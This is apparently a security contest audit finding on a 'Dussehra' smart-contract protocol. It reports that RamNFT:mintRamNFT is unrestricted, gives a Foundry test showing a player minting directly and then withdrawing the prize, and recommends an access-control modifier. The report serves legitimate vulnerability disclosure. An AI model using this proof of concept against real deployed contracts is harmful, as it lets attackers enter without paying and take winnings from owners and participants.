Anyone can join competition for Free
Summary
Anyone can enter the competitor for free via RamNFT:mintRamNFT.
Vulnerability Details
The contracts are designed so users must enter through Dussehra::enterPeopleWhoLikeRam, thus guaranteeing all entered users pay entranceFee and obtain an NFT via RamNFT:mintRamNFT. However, calling RamNFT:mintRamNFTdirectly allows anyone to obtain an NFT and thus enter Ram for free.
Impact
Beyond competitors being able to join the competition without risk and cost-free. The owner of the protocol and winning participant will also not receive an accurate payout as totalAmountGivenToRam in Dussehra::killRavana is calculated based on the length of WantToBeLikeRam and if users join the competition directly through RamNFT:mintRamNFT they are not accounted for in the length of WantToBeLikeRam thus shorting the owner & winner of deserved winnings.
Tools Used
Unit test
Code
address public player5 = makeAddr("player5");
function test_anyoneCanEnter() public participants {
vm.startPrank(player5);
ramNFT.mintRamNFT(player5);
choosingRam.increaseValuesOfParticipants(2, 2);
choosingRam.increaseValuesOfParticipants(2, 2);
choosingRam.increaseValuesOfParticipants(2, 2);
choosingRam.increaseValuesOfParticipants(2, 2);
choosingRam.increaseValuesOfParticipants(2, 2);
vm.stopPrank();
vm.warp(1728691200 + 1);
vm.startPrank(organiser);
choosingRam.selectRamIfNotSelected();
vm.stopPrank();
vm.startPrank(player5);
dussehra.killRavana();
vm.stopPrank();
uint256 RamwinningAmount = dussehra.totalAmountGivenToRam();
vm.startPrank(player5);
dussehra.withdraw();
vm.stopPrank();
assertEq(player5.balance, RamwinningAmount);
}
Recommendations
Add onlyChoosingRamContract modifier to RamNFT:mintRamNFT
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.